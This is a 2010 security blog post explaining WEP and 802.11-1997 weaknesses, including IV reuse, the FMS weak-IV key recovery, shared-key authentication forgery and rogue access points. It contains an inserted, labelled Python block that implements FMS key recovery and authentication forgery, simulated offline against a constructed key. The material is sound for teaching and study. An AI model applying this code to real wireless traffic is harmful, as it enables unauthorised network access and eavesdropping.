WLAN (802.11) Compromises and Vulnerabilities

Posted in Security on November 10th, 2010 by Rachael

Although it was considered adequate when the standard was published in 1997, WEP can nowadays be cracked with modest effort. To compromise WEP an adversary needs only a sniffer, which “passively monitors the WLAN and computes the encryption keys after a variable number of packets have been sniffed” [3]. WEP encrypts each frame with RC4 keyed by a 24-bit initialisation vector (IV) prepended to the shared key, and the IV itself travels in the clear. Two weaknesses follow from this. First, the IV space is small, so an attacker who captures two frames carrying the same IV holds two messages encrypted under the same keystream; XORing the two ciphertexts cancels the keystream and leaves the XOR of the plaintexts, from which the plaintexts can usually be recovered because 802.11 frames begin with predictable headers. Second, and more seriously, certain “weak” IVs leak information about the key itself: the Fluhrer, Mantin and Shamir attack collects frames sent under such IVs and recovers the shared key one byte at a time, after which the adversary can read any packet passed over the network [4].

Shared-key authentication begins with the access point sending the station a challenge in plaintext; the station returns the challenge encrypted under the WEP key and the access point checks the result. This is a major vulnerability: an eavesdropper who captures both the plaintext challenge and the encrypted response can XOR them together and recover the RC4 keystream used for that IV [1], with no need to compute the key. Because the station chooses the IV, the adversary can later answer a fresh challenge by reusing the same IV and the recovered keystream, and so authenticate to the access point without ever knowing the key [3].
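The two attacks described above, as an added worked example that is not part of the original post and is not code from any of the cited works. It simulates everything offline in Python against a constructed 40-bit key: the FMS attack of [4] recovers the key one byte at a time from frames sent under weak IVs of the form (i, 255, x), and the shared-key forgery reuses the keystream leaked by a single observed challenge/response pair. The key, the captured frame, the challenge bytes and all helper names (rc4_ksa, fms_vote, forge_auth_response and the rest) are assumptions made for this example. The first-keystream-byte “capture” is generated locally rather than sniffed; a real sniffer obtains the same byte by XORing the first ciphertext byte with the LLC/SNAP value 0xAA that starts every 802.11 data payload.

```python
"""Added example (not part of the original post): offline simulation of FMS key
recovery from weak-IV frames [4] and of shared-key authentication forgery by
keystream reuse, both against a constructed 40-bit WEP key. No network is touched."""
import zlib
from collections import Counter

SECRET_KEY = bytes.fromhex("1f8ac710ab")  # constructed 40-bit key (assumption)
FUDGE = 8  # top-voted candidates tried per key byte before backtracking

def rc4_ksa(key, rounds=256):
    """RC4 key scheduling for `rounds` rounds; returns state S and index j."""
    S, j = list(range(256)), 0
    for i in range(rounds):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j

def rc4_keystream(key, n):
    S, _ = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def icv(data):  # WEP integrity check value: CRC-32 of the payload, little-endian
    return zlib.crc32(data).to_bytes(4, "little")

def wep_xor(iv, key, data):  # WEP: XOR with RC4 keyed on the 24-bit IV || shared key
    return bytes(d ^ k for d, k in zip(data, rc4_keystream(iv + key, len(data))))

# One captured data frame (constructed), used only to confirm a candidate key.
CAPTURED_IV = b"\x5a\x13\x77"
CAPTURED_BODY = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"constructed IP payload"
CAPTURED_FRAME = wep_xor(CAPTURED_IV, SECRET_KEY, CAPTURED_BODY + icv(CAPTURED_BODY))

def key_is_correct(key):  # decrypt the captured frame and check its trailing ICV
    plain = wep_xor(CAPTURED_IV, key, CAPTURED_FRAME)
    return plain[-4:] == icv(plain[:-4])

def sniff_weak_iv_packets(key_len, key=SECRET_KEY):
    """Constructed capture: first keystream byte of one frame per weak IV (i, 255, x)."""
    capture = {}
    for i in range(3, key_len + 3):
        for x in range(256):
            iv = bytes([i, 255, x])
            capture[iv] = wep_xor(iv, key, b"\xaa")[0] ^ 0xAA  # ciphertext[0] XOR 0xAA
    return capture

def fms_vote(known, capture):
    """Rank candidates for the next secret byte; about 5% of weak IVs vote correctly."""
    i = len(known) + 3  # the KSA round that first consumes the unknown byte
    votes = Counter()
    for x in range(256):
        iv = bytes([i, 255, x])
        S, j = rc4_ksa(iv + known, i)  # replay the KSA through the bytes we know
        # "Resolved" state S[1] + S[S[1]] == i: unless a later round touches S[0], S[1]
        # or S[i], the first output byte is the value that round i swaps into S[i].
        if S[1] >= i or (S[1] + S[S[1]]) & 0xFF != i:
            continue
        votes[(S.index(capture[iv]) - j - S[i]) & 0xFF] += 1
    return [c for c, _ in votes.most_common(FUDGE)]

def fms_recover_key(key_len, capture, verify, known=b""):
    """Depth-first search over the top FUDGE candidates per byte, confirmed by verify()."""
    if len(known) == key_len:
        return known if verify(known) else None
    for cand in fms_vote(known, capture):
        key = fms_recover_key(key_len, capture, verify, known + bytes([cand]))
        if key is not None:
            return key
    return None

def station_respond(key, iv, challenge):
    """Legitimate station: WEP-encrypt the plaintext challenge plus its ICV."""
    return wep_xor(iv, key, challenge + icv(challenge))

def ap_verify_response(key, challenge, iv, response):
    """Access point: decrypt, then check the ICV and that the challenge text matches."""
    plain = wep_xor(iv, key, response)
    return plain[:-4] == challenge and plain[-4:] == icv(plain[:-4])

def forge_auth_response(seen_challenge, seen_iv, seen_response, new_challenge):
    """Eavesdropper: plaintext XOR ciphertext gives the keystream for seen_iv; since the
    station chooses the IV, reuse it to answer a fresh challenge without the key."""
    keystream = bytes(p ^ c for p, c in zip(seen_challenge + icv(seen_challenge), seen_response))
    new_plain = new_challenge + icv(new_challenge)
    return seen_iv, bytes(p ^ k for p, k in zip(new_plain, keystream))

if __name__ == "__main__":
    capture = sniff_weak_iv_packets(len(SECRET_KEY))
    print("FMS recovered key:", fms_recover_key(len(SECRET_KEY), capture, key_is_correct).hex())
    chal, iv = bytes(range(128)), b"\x01\x02\x03"  # constructed challenge and IV
    resp = station_respond(SECRET_KEY, iv, chal)
    new_chal = bytes(range(127, -1, -1))
    forged_iv, forged = forge_auth_response(chal, iv, resp, new_chal)
    print("forged response accepted:", ap_verify_response(SECRET_KEY, new_chal, forged_iv, forged))
```

Two design points are worth noting. Only about one weak-IV frame in twenty votes for the right key byte, so the code keeps the top FUDGE candidates per position and backtracks, confirming each complete key against the ICV of a captured data frame; this is the same idea as the fudge factor in aircrack-ng. And the shared-key forgery never learns the key at all: because the station picks the IV, replaying the observed IV with the recovered keystream is enough for the access point to accept the response.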

A further weakness of networks implementing the 802.11-1997 standard is that the standard provides no key management services. Because the administrators of such a network are responsible for creating, distributing, archiving and destroying the WEP shared keys by hand, the keys are often not changed regularly [3]. The longer a key stays in use, the more traffic an adversary can collect under it, and the more IV collisions and weak-IV packets that traffic contains, which makes recovering the key easier. Because manual key management is so tedious, many administrators also use the same WEP key for every device, which pools all of the network's traffic under a single key and shortens the time needed to gather enough packets.

One-way authentication between stations and access points is another major vulnerability in 802.11-1997 networks: the access point authenticates the station, but the station has no way to verify the access point and is forced to trust that whatever it associates with is legitimate [3]. This can be exploited through a wormhole attack, in which the attacker impersonates an access point and so diverts a “large percentage of traffic” [2] through attacker-controlled devices. If the diverted route is extremely slow the result is a denial of service, and because the data passes through the attacker's devices before being forwarded on, malicious code can be injected into it in transit [2].

Physical security controls can also be defeated by a determined adversary. Locks can be picked and photo identification can be forged, so limiting the range of the network's radio signal is of little use once the adversary has gained access to the building. Similarly, MAC address filtering is defeated by gaining access to an authorised station, or simply by adopting its address, since MAC addresses are transmitted in the clear.

References

[1] “IEEE Std 802.11-1997, Information technology - Telecommunications and information exchange between systems - Local and metropolitan area networks - Specific requirements - Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications,” IEEE, pp. i-445, 1997.
[2] S. Glass, “Wireless Network Security,” COMS4507 lecture, University of Queensland, Brisbane, 2008.
[3] K. Scarfone, D. Dicoi, M. Sexton and C. Tibbs, “Guide to Securing Legacy IEEE 802.11 Wireless Networks,” NIST Special Publication 800-48 Revision 1, Gaithersburg, MD, 2008.
[4] A. Stubblefield, J. Ioannidis and A. Rubin, “Using the Fluhrer, Mantin, and Shamir Attack to Break WEP,” AT&T Labs technical report, 2001.
